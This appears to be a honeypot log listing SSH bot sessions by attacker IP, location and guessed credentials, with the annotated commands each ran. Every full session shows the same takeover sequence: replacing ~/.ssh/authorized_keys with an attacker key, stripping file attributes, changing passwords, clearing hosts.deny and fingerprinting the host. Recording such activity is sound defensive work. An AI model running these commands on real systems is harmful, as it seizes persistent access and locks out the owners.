$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "asdfghjkl\nOa2bwNr2Mssc\nOa2bwNr2Mssc"|passwd|bash
$ Enter new UNIX password:
$ echo "asdfghjkl\nOa2bwNr2Mssc\nOa2bwNr2Mssc\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_34 (172.96.14.116) β€” Kansas City, United States Β· 2 sessions Β· 39 cmds
2026-05-25 08:37 EDT Β· as curl/welltech12, root/root1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "welltech12\naTPizAVh7KlA\naTPizAVh7KlA"|passwd|bash
$ Enter new UNIX password:
$ echo "welltech12\naTPizAVh7KlA\naTPizAVh7KlA\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:BhAUisgvRxrN"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 phantom_root_61 (45.195.8.231) β€” Manila, Philippines Β· 1 session Β· 20 cmds
2026-05-25 07:52 EDT Β· as user1/12345678
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "12345678\nYJB9UkKPq3GZ\nYJB9UkKPq3GZ"|passwd|bash
$ Enter new UNIX password:
$ echo "12345678\nYJB9UkKPq3GZ\nYJB9UkKPq3GZ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 star_root_31 (67.102.183.193) β€” Los Angeles, United States Β· 1 session Β· 20 cmds
2026-05-25 07:51 EDT Β· as curl/welltech12
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "welltech12\n0lmDL8XRFMyN\n0lmDL8XRFMyN"|passwd|bash
$ Enter new UNIX password:
$ echo "welltech12\n0lmDL8XRFMyN\n0lmDL8XRFMyN\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_3 (36.41.173.197) β€” Xincheng, China Β· 1 session Β· 20 cmds
2026-05-25 07:24 EDT Β· as uploader/uploader123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "uploader123\nox2l9YKCmfUl\nox2l9YKCmfUl"|passwd|bash
$ Enter new UNIX password:
$ echo "uploader123\nox2l9YKCmfUl\nox2l9YKCmfUl\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_16 (221.226.17.34) β€” Nanjing, China Β· 2 sessions Β· 40 cmds
2026-05-25 07:12 EDT Β· as cloud/Wangsu@2017, vpn/12345678
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "Wangsu@2017\nyXuoUHh6DniW\nyXuoUHh6DniW"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "Wangsu@2017\nyXuoUHh6DniW\nyXuoUHh6DniW\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "12345678\nCjpH4owmhj9r\nCjpH4owmhj9r"|passwd|bash
$ echo "12345678\nCjpH4owmhj9r\nCjpH4owmhj9r\n"|passwd
🎭 eagle_root_29 (198.46.253.146) β€” Buffalo, United States Β· 1 session Β· 19 cmds
2026-05-25 07:19 EDT Β· as root/Ss123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:BBsYuERoXqwm"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_66 (171.244.37.96) β€” Hanoi, Vietnam Β· 2 sessions Β· 40 cmds
2026-05-25 06:53 EDT Β· as cloud/Wangsu@2017, curl/welltech12
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "Wangsu@2017\nPXreNp64vYmI\nPXreNp64vYmI"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "Wangsu@2017\nPXreNp64vYmI\nPXreNp64vYmI\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "welltech12\n2tkz3esKUBVd\n2tkz3esKUBVd"|passwd|bash
$ echo "welltech12\n2tkz3esKUBVd\n2tkz3esKUBVd\n"|passwd
🎭 cowboy_root_35 (204.10.161.90) β€” Kansas City, United States Β· 3 sessions Β· 42 cmds
2026-05-25 06:46 EDT Β· as cloud/Wangsu@2017, curl/welltech12, root/123123aA
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "welltech12\nGV8IQd48PsFw\nGV8IQd48PsFw"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "welltech12\nGV8IQd48PsFw\nGV8IQd48PsFw\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "Wangsu@2017\n6lO7mNx6J5Ph\n6lO7mNx6J5Ph"|passwd|bash
$ echo "Wangsu@2017\n6lO7mNx6J5Ph\n6lO7mNx6J5Ph\n"|passwd
🎭 eagle_root_30 (129.212.184.120) β€” Douglasville, United States Β· 2 sessions Β· 22 cmds
2026-05-25 06:52 EDT Β· as cloud/Wangsu@2017, root/123456abc.
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Wangsu@2017\nJFkw966mcHGg\nJFkw966mcHGg"|passwd|bash
$ Enter new UNIX password:
$ echo "Wangsu@2017\nJFkw966mcHGg\nJFkw966mcHGg\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_5 (89.153.125.230) β€” Vila Nova de Gaia, Portugal Β· 1 session Β· 20 cmds
2026-05-25 07:05 EDT Β· as netflow/netflow2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "netflow2025\noHEXdTM8qrR9\noHEXdTM8qrR9"|passwd|bash
$ Enter new UNIX password:
$ echo "netflow2025\noHEXdTM8qrR9\noHEXdTM8qrR9\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_53 (124.43.4.17) β€” Piliyandala, Sri Lanka Β· 2 sessions Β· 40 cmds
2026-05-22 23:30 EDT Β· as cloud/Wangsu@2017, runner/admin
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "Wangsu@2017\nmlWtKW9agTbF\nmlWtKW9agTbF"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "Wangsu@2017\nmlWtKW9agTbF\nmlWtKW9agTbF\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "admin\nR8y5EPmGwHvq\nR8y5EPmGwHvq"|passwd|bash
$ echo "admin\nR8y5EPmGwHvq\nR8y5EPmGwHvq\n"|passwd
🎭 ghost_root_72 (205.235.2.176) β€” Quito, Ecuador Β· 1 session Β· 20 cmds
2026-05-25 06:53 EDT Β· as cloud/Wangsu@2017
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Wangsu@2017\n1cNZ47nSXeGU\n1cNZ47nSXeGU"|passwd|bash
$ Enter new UNIX password:
$ echo "Wangsu@2017\n1cNZ47nSXeGU\n1cNZ47nSXeGU\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 pretzel_root_14 (87.120.166.32) β€” Frankfurt am Main, Germany Β· 1 session Β· 2 cmds
2026-05-25 06:42 EDT Β· as root/1qazXSW2
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 monet (151.80.141.196) β€” Roubaix, France Β· 1 session Β· 2 cmds
2026-05-25 06:31 EDT Β· as cloud/Wangsu@2017
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
